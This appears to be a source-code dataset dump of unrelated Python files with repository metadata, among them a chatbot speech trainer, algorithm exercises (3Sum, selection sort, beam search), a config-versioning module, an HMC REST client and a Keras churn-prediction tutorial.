class SpeechTrainer(ListTrainer):
    """A chatterbot ListTrainer that also pre-generates speech audio for
    each trained statement, with bounded-concurrency downloads."""
    def __init__(self, storage, **kwargs):
        """storage: chatterbot storage that also persists speech files.
        kwargs: 'text_to_speech' engine, optional 'offline' flag,
        required 'threads_num' (max concurrent TTS downloads)."""
        super().__init__(storage, **kwargs)
        self.speech_storage = storage
        self.text_to_speech = kwargs.get('text_to_speech')
        self.offline = kwargs.get('offline', False)
        self.threads_num = kwargs['threads_num']
    def download_speeches(self, statements):
        """Synthesize and persist audio for each statement.

        No-op in offline mode; statements already present in the speech
        storage are skipped. Blocks until all downloads finish.
        """
        if self.offline:
            self.logger.warning('specified offline mode for training')
            return
        assert self.speech_storage is not None, 'speech_storage is none'
        self.logger.info('starting downloading {} speeches'.format(len(statements)))
        # At most threads_num threads do TTS work at the same time.
        semaphore = Semaphore(self.threads_num)
        threads = []
        def thread_runner(stat, file, storage, logger):
            # Synthesize to a temp wav, store it, then remove the temp file.
            with semaphore:
                logger.info('downloading {}'.format(file))
                self.text_to_speech.save_to_file(stat, file)
                storage.insert_speech_file(stat, file)
                os.remove(file)
                logger.info('{} done'.format(file))
        for i, statement in enumerate(statements):
            if self.speech_storage.is_statement_exists(statement):
                self.logger.warning('statement {} already exists in speech storage'.format(statement))
                continue
            # Index-prefixed temp filename keeps concurrent workers apart.
            thread_runner_args = (statement, '{}_{}'.format(i, 'voice.wav'),
                                  self.speech_storage,
                                  self.logger)
            thread = Thread(target=thread_runner, args=thread_runner_args)
            threads.append(thread)
            thread.start()
        for thread in threads:
            thread.join()
        self.logger.info('speeches has been downloaded')
class DialogFileTrainer(SpeechTrainer):
    """Trains the bot from a plain-text file, one statement per line."""

    def __init__(self, storage, **kwargs):
        super().__init__(storage, **kwargs)

    def train(self, filename):
        """Train on the lines of ``filename`` and download their speeches.

        Args:
            filename: path to a UTF-8 text file, one statement per line.

        Raises:
            Exception: re-raises whatever download_speeches failed with.
        """
        self.logger.info('beginning training')
        with open(filename, 'r', encoding='utf-8') as f:
            # BUG FIX: the old code removed at most ONE empty line
            # (list.remove deletes only the first match); drop them all.
            statements = [line for line in f.read().split('\n') if line]
        super().train(statements)
        try:
            self.download_speeches(statements)
        except Exception as e:
            self.logger.error('failed to load speeches')
            raise e
        self.logger.info('training complete')
class ExcelTrainer(SpeechTrainer):
    """Trains the bot from an Excel sheet: column A holds semicolon-separated
    requests, column B the matching semicolon-separated responses."""
    def __init__(self, storage, **kwargs):
        super().__init__(storage, **kwargs)
    def train(self, filename):
        """Read the active worksheet of ``filename`` and link every response
        in a row to every request in the same row, then download speeches."""
        self.logger.info('beginning training')
        wb = load_workbook(filename, read_only=True)
        ws = wb.active
        statements = []
        count = 0
        for row in ws.rows:
            # Rows with an empty request cell are skipped entirely.
            if row[0].value is None:
                continue
            requests = [str(r).strip() for r in str(row[0].value).strip('; ').split(';')]
            responses = [str(r).strip() for r in str(row[1].value).strip('; ').split(';')]
            count += len(responses)
            statements.extend(responses)
            # Cross-link: every response answers every request of the row.
            for request in requests:
                for response in responses:
                    statement = self.get_or_create(response.strip())
                    statement.add_response(Response(text=request.strip()))
                    self.storage.update(statement)
        self.logger.info('training complete {} statements'.format(count))
        try:
            self.download_speeches(statements)
        except Exception as e:
            self.logger.error('failed to load speeches')
            # NOTE(review): unlike DialogFileTrainer this prints instead of
            # re-raising -- confirm swallowing the error here is intended.
            print(e)
| [
"noreply@github.com"
] | noreply@github.com |
1fc8429f96e9d5bb07215d6eee4e8caf868fceb5 | 1e92bf05112d6dd00a71940e81265c06522f9280 | /3. Arrays/3Sum.py | 35707403f2b8d48a7f2a328066ebabce3c4810e9 | [] | no_license | bhasin85/Teachable | cd54c2b71c152bd679edef9475720309c247ff26 | d77a9ac0515942c0d7944d026dc974ab7036b71d | refs/heads/master | 2023-01-21T23:28:05.251596 | 2020-06-23T09:40:19 | 2020-06-23T09:40:19 | 258,916,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | # i 0
# p1 0
# p2
# [-4,-1,-1, 0, 1, 2] 6
# [-2,0,1,1,2]
# [-2,]
class Solution:
    def threeSum(self, nums: List[int]) -> List[List[int]]:
        """Return all unique triplets [a, b, c] from nums with a + b + c == 0.

        Sorts the input in place, anchors the smallest element of each
        candidate triplet and closes in on the remaining pair with two
        pointers, skipping duplicates. O(n^2) time.

        Fixes over the previous version: returns lists (matching the declared
        annotation; it used to return tuples), and removes the fragile
        "stop when a pointer reaches the anchor index" termination in favor
        of the standard duplicate-skipping scan.
        """
        nums.sort()
        n = len(nums)
        result = []
        for i in range(n - 2):
            # Skip duplicate anchors so each triplet is emitted once.
            if i > 0 and nums[i] == nums[i - 1]:
                continue
            # Sorted: once the anchor is positive no triple can sum to zero.
            if nums[i] > 0:
                break
            lo, hi = i + 1, n - 1
            while lo < hi:
                total = nums[i] + nums[lo] + nums[hi]
                if total < 0:
                    lo += 1
                elif total > 0:
                    hi -= 1
                else:
                    result.append([nums[i], nums[lo], nums[hi]])
                    lo += 1
                    hi -= 1
                    # Step past duplicates of the matched pair.
                    while lo < hi and nums[lo] == nums[lo - 1]:
                        lo += 1
                    while lo < hi and nums[hi] == nums[hi + 1]:
                        hi -= 1
        return result
"noreply@github.com"
] | noreply@github.com |
25f5f4bc546237c9a21c8f825aa2abee0b5e3640 | 9f2762e8cdb020715034ef73023d3fd82e544b91 | /PROJECTS/p002/PSEF_SCRIPTS/mult_cfg.py | f36b5c813f315e15146e18c4e045642d54fc82d5 | [
"Apache-2.0"
] | permissive | nihole/PSEFABRIC | ade9ecf305f5974dc48520576e7e75d522d00cf9 | 366461ab86f99665bf310425c6ce05a216343ec9 | refs/heads/master | 2020-04-04T21:36:53.427341 | 2019-05-30T22:52:13 | 2019-05-30T22:52:13 | 156,292,904 | 9 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,965 | py | ######################################
# #
# 5. #
# configuration encapsulator #
# layer #
# #
######################################
'''
Three purposes of this layer:
- some additional configuration manipulation, for example:
(additional modules may be used for this purposes)
- removing of duplicated lines
- restoring of correct order of commnads if necessary
- encapsulation or adaptation of the configuration files to protocols or tools are used at Layer 6 (telnet/ssh, neconf, ansible etc.)
- saving of configuration files (folder $PSEFABRIC/PSEF_CONF/EQ_CONF/)
'''
import versionfile as vrs
import os
import host_to_type
import re
import copy
import pa_cfg_correction
import aci_cfg_correction
PSEFABRIC = os.environ['PSEFABRIC']
def version_file(eq_addr_, conf_, ext_):
    """Version the device's existing config file, then write the new config.

    Args:
        eq_addr_: device address; used to name the file.
        conf_: configuration text to write.
        ext_: file extension ('txt', 'json', ...).
    """
    path_ = '%s/PSEF_CONF/EQ_CONF/%s.%s' % (PSEFABRIC, eq_addr_, ext_)
    if not os.path.isfile(path_):
        # Create an empty file so VersionFile has something to rotate.
        # BUG FIX: the handle from open(path_, 'a') was never closed.
        open(path_, 'a').close()
    if (vrs.VersionFile(path_)):
        with open(path_, 'w') as f10:
            f10.write(conf_)
            f10.flush()
    else:
        print("Versioning file failed")
def mult_cfg(cfg_):
    """Adapt and save per-device configurations.

    For each device address in ``cfg_``, picks the correct config-correction
    backend from the device's type (Palo Alto panorama -> CLI text, Cisco
    ACI -> JSON) and versions/saves the resulting file.

    Args:
        cfg_: mapping of device address -> raw configuration.

    Returns:
        "OK" on completion.
    """
    # Deep copy so deleting processed entries never mutates the shared map.
    host_ = copy.deepcopy(host_to_type.host_to_type())
    for eq_addr in cfg_:
        if re.search('panorama', host_[eq_addr]):
            config = pa_cfg_correction.pa_cli_correction(cfg_[eq_addr])
            version_file(eq_addr, config,'txt')
        elif re.search('aci', host_[eq_addr]):
            config = aci_cfg_correction.aci_json_correction(cfg_[eq_addr])
            version_file(eq_addr, config,'json')
        del host_[eq_addr]
    return "OK"
| [
"nihole"
] | nihole |
39206d2358730cbaaafc66c76aafc84382af746a | 6a62bd2c79536d7392fc49d0e8bda279aef512b2 | /conditionals/cond3.py | 67ff55bdd4dc20daeb2b3401764e18b9d6e70b05 | [] | no_license | codecachet/examples | 7df7257627ff831ec3cac19f1fabd03c2b66933d | 5bd697307144f38b03abd7ffa350f11b5e79f102 | refs/heads/master | 2020-04-13T13:17:24.074184 | 2019-04-28T22:08:20 | 2019-04-28T22:08:20 | 163,225,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | def loop1(max):
n = 0
x = 0
while n <= max:
x += n
n += 1
return x
def addthem():
    """Sum the integers 0..6 via loop1 and print the result."""
    limit = 6
    total = loop1(limit)
    print(f'result={total}')
| [
"david@codecachet.org"
] | david@codecachet.org |
d2894ba6e632b91ec3412e5b44336eb0e03154d2 | fec261e7717769078dd0044b3ac19e509ff65afa | /python/sort/selection_sort.py | bb4e47579b4fa5b22a4eeda18c29a39cc587698f | [] | no_license | ne7ermore/playground | af94854c6da01b43b1e10ea891129a749ea9d807 | 072406e562e0d33c650ba01bf9ebfbe593f55d5c | refs/heads/master | 2021-06-02T13:19:34.110406 | 2020-05-28T10:49:12 | 2020-05-28T10:49:12 | 108,945,081 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | def selection_sort(arr):
for i in range(len(arr)):
cor_index = i
for j in range(i, len(arr)):
if arr[j] < arr[cor_index]:
cor_index = j
arr[i], arr[cor_index] = arr[cor_index], arr[i]
return arr
if __name__ == "__main__":
    # Smoke test: length is preserved and output is the expected order.
    arr = [10, 20, 5, 9, 3, 8, 12, 14, 90, 0, 60, 40, 23, 35, 95, 18]
    assert len(selection_sort(arr)) == len(arr)
    assert selection_sort(arr) == [0, 3, 5, 8, 9, 10, 12,
                                   14, 18, 20, 23, 35, 40, 60, 90, 95]
| [
"422618856@qq.com"
] | 422618856@qq.com |
6f6e441bbde59763d7fe65221a6f86714e769020 | 2082cd57fa2325a508af5f10bd00e8eca059bc09 | /src/geometry/manifolds/translation_algebra.py | 67b1958cc3594e112a9cdeb471c3976addf27f7f | [] | no_license | efernandez/geometry | 98e5894a83acaa32eefb2187374d4c34801a5600 | ec7fa1308224f3d156c54495bc4b05ce47a41004 | refs/heads/master | 2021-01-18T16:51:13.964917 | 2014-11-04T14:03:59 | 2014-11-04T14:03:59 | 36,390,891 | 0 | 1 | null | 2015-05-27T19:35:14 | 2015-05-27T19:35:14 | null | UTF-8 | Python | false | false | 1,237 | py | from . import MatrixLieAlgebra
from .. import extract_pieces, combine_pieces
from contracts import contract
import numpy as np
class tran(MatrixLieAlgebra):
    '''
        Lie algebra of the translation group, represented as matrices whose
        only non-zero part is the translation column (pieces: W block,
        vector v, and zeros).
    '''
    @contract(n="1|2|3")
    def __init__(self, n):
        # Matrices are (n+1)x(n+1); the algebra itself has dimension n.
        MatrixLieAlgebra.__init__(self, n + 1, dimension=n)
    def norm(self, X):
        """Norm of an element: Euclidean norm of its translation part."""
        W, v, zero, zero = extract_pieces(X) # @UnusedVariable
        return np.linalg.norm(v)
    def project(self, X):
        """Project a matrix onto the algebra: keep only the translation part."""
        W, v, zero, zero = extract_pieces(X) # @UnusedVariable
        return combine_pieces(W * 0, v, v * 0, 0)
    def __repr__(self):
        # self.n is the matrix size, so the group dimension is n - 1.
        return 'tr%s' % (self.n - 1)
    def interesting_points(self):
        """Representative elements; for translations, just the zero element."""
        points = []
        points.append(self.zero())
        return points
    @contract(a='belongs')
    def vector_from_algebra(self, a):
        """Extract the translation vector (length ``self.n - 1``) from ``a``."""
        W, v, zero, zero = extract_pieces(a) # @UnusedVariable
        if v.shape == ():
            # 0-d arrays (scalar translations) become 1-element vectors.
            v = v.reshape(1)
        assert v.size == self.n - 1
        return v
    @contract(returns='belongs', v='array[K]')
    def algebra_from_vector(self, v):
        """Embed vector ``v`` into an algebra element (inverse of the above)."""
        assert v.size == self.n - 1
        return combine_pieces(np.zeros((self.n - 1, self.n - 1)), v, v * 0, 0)
| [
"andrea@cds.caltech.edu"
] | andrea@cds.caltech.edu |
37879211d77b9b1040a5740a3343467cdd3d662d | c282727ef1ccb490beb62c4f56f4f2cbbb7b32c4 | /src/management_console/ListManagementConsole.py | d612c92520a4942f8348ab3a06e2a806b0afbb32 | [
"Apache-2.0"
] | permissive | kastellanos/HmcRestClient | 64f5baf52ac6dff3dd221d6b815f652e1278a723 | fa8a88a3cb7ecb6e241ff48b8c0dc3f99c3c38f3 | refs/heads/master | 2021-01-15T22:09:47.770432 | 2016-07-12T14:17:11 | 2016-07-12T14:17:11 | 62,428,157 | 0 | 0 | null | 2016-07-02T01:24:05 | 2016-07-02T01:24:04 | null | UTF-8 | Python | false | false | 3,317 | py | # Copyright 2015, 2016 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from src.utility import HTTPClient,HMCClientLogger,HmcHeaders
from src.common import ListModule
log_object=HMCClientLogger.HMCClientLogger(__name__)
CONTENT_TYPE = "application/vnd.ibm.powervm.uom+xml; type=ManagementConsole"
class ListManagementConsole(object):
    """
    Lists the details of the HMC Management Console.
    """
    def __init__(self):
        """
        Initializes the content type used for ManagementConsole requests.
        """
        self.content_type = CONTENT_TYPE
    def list_ManagementConsole(self, ip, session_id):
        """
        collects the xml content of the management console and
        returns a reference to it
        Args:
            ip : ip address of HMC
            session_id : session to be used
        """
        log_object.log_debug("List of ManagementConsole started")
        listing_object = ListModule.ListModule()
        #call to get the xml content of managed system #
        object_list = listing_object.listing("uom",ip, "ManagementConsole", self.content_type, "ManagementConsole", session_id)
        log_object.log_debug("Returns ManagementConsole"
                             " objects to the main module")
        return object_list
    def print_managementconsole_attributes(self, managementconsole_object):
        """
        Prints the quick property values from the retrieved xml content
        Args:
            managementconsole_object : the ManagementConsole object whose
                attributes should be printed
        """
        print("\n")
        print("ManagementConsoleName".ljust(35), ":",
              managementconsole_object.ManagementConsoleName.value())
        print("BaseVersion".ljust(35), ":", managementconsole_object.BaseVersion.value())
        print("Management Console id".ljust(35), ":",
              managementconsole_object.Metadata.Atom.AtomID.value())
        #print("\nNETWORK INTERFACES\n")
        try:
            for entry in range(0, len(managementconsole_object.NetworkInterfaces.\
                                      ManagementConsoleNetworkInterface)):
                print ("MANAGEMENT CONSOLE NETWORK INTERFACE".ljust(35), ":", entry)
                print ("InterfaceName".ljust(35), ":",managementconsole_object.\
                       NetworkInterfaces.ManagementConsoleNetworkInterface[entry].\
                       InterfaceName.value())
                print ("NetworkAddress".ljust(35), ":", managementconsole_object.\
                       NetworkInterfaces.ManagementConsoleNetworkInterface[entry].\
                       NetworkAddress.value())
        # NOTE(review): broad swallow -- consoles without network interfaces
        # fall through silently; confirm that is intended.
        except Exception:
            pass
| [
"niraj.shah@in.ibm.com"
] | niraj.shah@in.ibm.com |
be9add49d0aeacb6d7afb2c253e3af21d0d744e8 | 4b0abab9cccec5789c9f5453c542a8567d448459 | /main.py | aac3ce2162ca9a2cc9cd57d8746ab8afb35878fe | [] | no_license | aastha2008/Aastha-test-1 | 9a88f801b220704b837f945af8038e6a24b9a05a | 28b4601ae016122f7bafbe564294ab11094b2fc9 | refs/heads/master | 2023-02-22T14:05:30.394348 | 2021-01-14T23:47:35 | 2021-01-14T23:47:35 | 329,761,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | print("hello world")
x=20
y=5
m=x+y
print(m)
| [
"109658@eesd.org"
] | 109658@eesd.org |
39437032dd7ce969ba97304c78120010116c1c0e | 6addd46151c72418179601f8a2acae82df698e1b | /lib/Pool.py | 923e947c213202af48897e10f02261a169f8be22 | [] | no_license | chocciibuster/Polaroid_Chatbot | ce783d995a7dd991079a3b4f50acd77e2d8b08d7 | c30d390d5a5670974c92ae516678f2a14939dd8f | refs/heads/main | 2023-05-05T09:55:19.244745 | 2021-05-21T15:19:03 | 2021-05-21T15:19:03 | 369,216,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from Member import Member
class Pool:
def __init__(self, members):
self.members = members
self.goal = 100000 * len(members)
self.balance = 0
self.status = 0
def addMembers(self, members):
pass
def removeMembers(self, members):
pass
| [
"75527948+chocciibuster@users.noreply.github.com"
] | 75527948+chocciibuster@users.noreply.github.com |
a26cff623a0c12894aafb69e2e6e8b6698bf3b5d | fa22e83863d60858e2386c2ae0923d065886000a | /src/layers/beam_search.py | 4809e633b60c4e2909d7b6a6b3a859896bad75ac | [
"MIT"
] | permissive | NoSyu/VHUCM | aa96e9b4720425973888a743c3d2154feec4a234 | 3fab78f1b0cced8d9b2a2d5b6f3d6f1021ce9a93 | refs/heads/master | 2023-06-10T00:50:32.803670 | 2021-07-02T00:55:55 | 2021-07-02T00:55:55 | 203,309,770 | 9 | 0 | MIT | 2020-02-02T08:20:22 | 2019-08-20T06:02:07 | Python | UTF-8 | Python | false | false | 3,140 | py | import torch
from utils import EOS_ID
class Beam(object):
def __init__(self, batch_size, hidden_size, vocab_size, beam_size, max_unroll, batch_position):
"""Beam class for beam search"""
self.batch_size = batch_size
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.beam_size = beam_size
self.max_unroll = max_unroll
self.batch_position = batch_position
self.log_probs = list()
self.scores = list()
self.back_pointers = list()
self.token_ids = list()
self.metadata = {'inputs': None, 'output': None, 'scores': None, 'length': None, 'sequence': None}
def update(self, score, back_pointer, token_id):
self.scores.append(score)
self.back_pointers.append(back_pointer)
self.token_ids.append(token_id)
def backtrack(self):
prediction = list()
length = [[self.max_unroll] * self.beam_size for _ in range(self.batch_size)]
top_k_score, top_k_idx = self.scores[-1].topk(self.beam_size, dim=1)
top_k_score = top_k_score.clone()
n_eos_in_batch = [0] * self.batch_size
back_pointer = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)
for t in reversed(range(self.max_unroll)):
token_id = self.token_ids[t].index_select(0, back_pointer)
back_pointer = self.back_pointers[t].index_select(0, back_pointer)
eos_indices = self.token_ids[t].data.eq(EOS_ID).nonzero()
if eos_indices.dim() > 0:
for i in range(eos_indices.size(0) - 1, -1, -1):
eos_idx = eos_indices[i, 0].item()
batch_idx = eos_idx // self.beam_size
batch_start_idx = batch_idx * self.beam_size
_n_eos_in_batch = n_eos_in_batch[batch_idx] % self.beam_size
beam_idx_to_be_replaced = self.beam_size - _n_eos_in_batch - 1
idx_to_be_replaced = batch_start_idx + beam_idx_to_be_replaced
back_pointer[idx_to_be_replaced] = self.back_pointers[t][eos_idx].item()
token_id[idx_to_be_replaced] = self.token_ids[t][eos_idx].item()
top_k_score[batch_idx,
beam_idx_to_be_replaced] = self.scores[t].view(-1)[eos_idx].item()
length[batch_idx][beam_idx_to_be_replaced] = t + 1
n_eos_in_batch[batch_idx] += 1
prediction.append(token_id)
top_k_score, top_k_idx = top_k_score.topk(self.beam_size, dim=1)
final_score = top_k_score.data
for batch_idx in range(self.batch_size):
length[batch_idx] = [length[batch_idx][beam_idx.item()]
for beam_idx in top_k_idx[batch_idx]]
top_k_idx = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)
prediction = [step.index_select(0, top_k_idx).view(
self.batch_size, self.beam_size) for step in reversed(prediction)]
prediction = torch.stack(prediction, 2)
return prediction, final_score, length
| [
"dongdm@gmail.com"
] | dongdm@gmail.com |
ef617912f64bce4020083b3e65bcb5438a6b7fb4 | 345c6cf82eb242ef7b863af8eecd459f85c89940 | /test_19_mvsemicolon.py | fd4e4015c392bc29277176fd59d54a3c2c459c85 | [] | no_license | 718970079816800/PythonStudy | 9fe0e4644c9724ced69f732c953702b893d83baf | 320eaca1ffe4dd1139aef41b4ec278ef395b3649 | refs/heads/master | 2021-07-16T21:57:40.055244 | 2020-05-09T12:14:59 | 2020-05-09T12:14:59 | 148,250,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | import os
import os.path
import shutil
pathDir = 'F:\\Data\\OtherTxt\\'
os.chdir(pathDir)
files = os.listdir(pathDir)
for f in files:
print f
with open(f, 'r') as g:
firstline = g.readline()
if len(firstline.split(';')) == 2:
pass
else:
shutil.copy(f, 'F:\\Data\\UserPassTxt\\movesemicolon\\')
| [
"noreply@github.com"
] | noreply@github.com |
3a36a2d2375d06055ac1d8512208165b78fe37aa | 3e52ad548b7138b3d83310a5375cc8a3c5886580 | /AI-ML/Supervised/ANN/Classification/artificial_neural_network.py | af13fae9193126525f062251d9509be5d3717d28 | [] | no_license | alexal9/AI-ML | 8ccdd05daac9c465ad7c2cdf35939d33266cdd1e | ce43619702ac6af95378eaaafb555405aba9452f | refs/heads/master | 2022-11-23T02:35:44.335615 | 2020-07-28T08:39:57 | 2020-07-28T08:39:57 | 283,151,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,057 | py | # Artificial Neural Network
# Importing the libraries
import numpy as np
import pandas as pd
import tensorflow as tf
print(tf.__version__)
# Part 1 - Data Preprocessing
# Importing the dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:, 3:-1].values
y = dataset.iloc[:, -1].values
print(X)
print(y)
# Encoding categorical data
# Label Encoding the "Gender" column
## basically the same as one hot encoding and dropping a column
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
X[:, 2] = le.fit_transform(X[:, 2])
print(X)
# One Hot Encoding the "Geography" column
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], remainder='passthrough')
# X = np.array(ct.fit_transform(X))
# drop first column of dummy variables to address multicollinearity
X = np.array(ct.fit_transform(X))[:, 1:]
print(X)
## alternatively, we can manipulate the dataframe with
## dataset_with_dummies = pd.get_dummies(dataset, drop_first=True)
## to perform one hot encoding while removing the first dummy variable
## and then extract X,y with iloc[].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Part 2 - Building the ANN
# Initializing the ANN
ann = tf.keras.models.Sequential()
# Adding the input layer and the first hidden layer
ann.add(tf.keras.layers.Dense(units=6, activation='relu'))
# Adding the second hidden layer
ann.add(tf.keras.layers.Dense(units=6, activation='relu'))
# Adding the output layer
ann.add(tf.keras.layers.Dense(units=1, activation='sigmoid'))
# Part 3 - Training the ANN
# Compiling the ANN
ann.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Training the ANN on the Training set
ann.fit(X_train, y_train, batch_size = 32, epochs = 100)
# Part 4 - Making the predictions and evaluating the model
# Predicting the result of a single observation
"""
Homework:
Use our ANN model to predict if the customer with the following informations will leave the bank:
Geography: France
Credit Score: 600
Gender: Male
Age: 40 years old
Tenure: 3 years
Balance: $ 60000
Number of Products: 2
Does this customer have a credit card? Yes
Is this customer an Active Member: Yes
Estimated Salary: $ 50000
So, should we say goodbye to that customer?
Solution:
"""
# print(ann.predict(sc.transform([[1, 0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]])) > 0.5)
print(ann.predict(sc.transform([[0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]])) > 0.5)
"""
Therefore, our ANN model predicts that this customer stays in the bank!
Important note 1: Notice that the values of the features were all input in a double pair of square brackets. That's because the "predict" method always expects a 2D array as the format of its inputs. And putting our values into a double pair of square brackets makes the input exactly a 2D array.
Important note 2: Notice also that the "France" country was not input as a string in the last column but as "1, 0, 0" in the first three columns. That's because of course the predict method expects the one-hot-encoded values of the state, and as we see in the first row of the matrix of features X, "France" was encoded as "1, 0, 0". And be careful to include these values in the first three columns, because the dummy variables are always created in the first columns.
"""
# Predicting the Test set results
y_pred = ann.predict(X_test)
y_pred = (y_pred > 0.5)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, accuracy_score
cm = confusion_matrix(y_test, y_pred)
print(cm)
accuracy_score(y_test, y_pred) | [
"noreply@github.com"
] | noreply@github.com |
006d5216c55a276b30c61478f4da189fc81ca037 | 7bf287e00b35f50afa70e8585f41d1db543d98f2 | /Medium/FindLeavesOfBinaryTree.py | c914ab48ab422fd2ee73e77c175d3f5a5d0fe9c8 | [] | no_license | mangalagb/Leetcode | eac611453de07ffc635265e98c39b46255cf76c6 | fcf6c3d5d60d13706950247d8a2327adc5faf17e | refs/heads/master | 2022-05-14T23:16:28.007044 | 2022-04-29T19:33:24 | 2022-04-29T19:33:24 | 158,616,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | # #Given the root of a binary tree, collect a tree's nodes as if you were doing this:
#
# Collect all the leaf nodes.
# Remove all the leaf nodes.
# Repeat until the tree is empty.
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution(object):
def findLeaves(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
ans = []
while root is not None:
leaves = []
self.remove_leaves(root, None, None, leaves)
#it is a root node
if len(leaves) == 0:
leaves.append(root.val)
root = None
ans.append(leaves)
return ans
def remove_leaves(self, node, parent, isLeftChild, leaves):
if not node:
return
#If node is a leaf
if not node.left and not node.right:
if isLeftChild is None:
return
if isLeftChild:
parent.left = None
else:
parent.right = None
leaves.append(node.val)
if node.left:
self.remove_leaves(node.left, node, True, leaves)
if node.right:
self.remove_leaves(node.right, node, False, leaves)
def make_tree(self):
root = TreeNode(1)
node2 = TreeNode(2)
node3 = TreeNode(3)
node4 = TreeNode(4)
node5 = TreeNode(5)
root.left = node2
root.right = node3
node2.left = node4
node2.right = node5
return root
def make_tree1(self):
root = TreeNode(1)
return root
my_sol = Solution()
root = my_sol.make_tree()
print(my_sol.findLeaves(root)) #[[4,5,3],[2],[1]]
root = my_sol.make_tree1()
print(my_sol.findLeaves(root)) #[[1]]
| [
"mangalagb@gmail.com"
] | mangalagb@gmail.com |
137dfeec2dbbe9c5d924c0adec0e07bf2eac64d4 | 77aa89620bb2773100082e268f07fa0b8b80b4f1 | /scripts/get_previews.py | 458874472e92114f471550b6cf65d66d9d28e396 | [] | no_license | d-alvear/Analyzing-Music-by-Decade | 40f771f9bdd6a7c8119966530fb0f444eae47828 | adc5b1e5c2bb288700de0abdc72ffe636e71876a | refs/heads/main | 2023-01-20T23:27:53.577018 | 2020-12-03T18:13:04 | 2020-12-03T18:13:04 | 308,172,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | import pandas as pd
import numpy as np
import requests
from IPython.display import clear_output
def get_mp3(track_id, url):
'''A function that takes an mp3 url, and writes it to the local
directory "/tmp"'''
doc = requests.get(url)
with open(f'C:/Users/deand/Documents/Repositories/Music-Analysis/data/previews/track_{track_id}.wav', 'wb') as f:
f.write(doc.content)
songs = pd.read_csv("C:/Users/deand/Documents/Repositories/Music-Analysis/data/all_decades_songs_V3.csv", index_col=0)
err = {}
for i, row in songs.iterrows():
try:
get_mp3(row['track_id'], row['preview_url'])
except:
err[row['track_id']] = row['preview_url']
clear_output(wait=True)
print(f"{i+1}/{len(songs)}")
print(err)
| [
"deandraalvear@gmail.com"
] | deandraalvear@gmail.com |
fc4843dbe74e0b7bedb04ad7a110695dcc7c14bd | 9e08a89c02e737f8371b6d0c16bc8c64484fd07f | /assignments/assignment11/definitions.py | fee7455dda5e352a6ac670b5aac1aae50145f674 | [] | no_license | gatlinL/csce204 | c0ecab2c8efd25dc428d591aaeb43ca5c0f589cd | f86959b09a67c20eac1a96b5737929fc491f83fe | refs/heads/main | 2023-04-20T19:36:31.183034 | 2021-05-05T03:25:52 | 2021-05-05T03:25:52 | 329,712,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,033 | py | # Author: Gatlin Lawson
def getDictionary():
dictionary = {}
with open("assignments/assignment11/words.txt") as file:
for line in file:
data = line.split(':')
word = data[0].strip()
wordDef = data[1].strip()
dictionary[word] = wordDef
return dictionary
def getDefinition():
wordChoice = input("Enter Word: ").lower()
if wordChoice in wordDef:
print(f"{wordChoice}: {wordDef[wordChoice]}")
else:
print(f"Sorry, {wordChoice} is not in our system")
def displayDictionary():
for word in wordDef:
print(f"{word}: {wordDef[word]}")
print("Welcome to our dictionary")
wordDef = getDictionary()
while True:
answer = input("Would you like to (V)iew, (D)efine, or (Q)uit: ").lower()
if answer == "q":
break
elif answer == "v":
displayDictionary()
elif answer == "d":
getDefinition()
else:
print("Invlaid input")
print("Goodbye") | [
"noreply@github.com"
] | noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.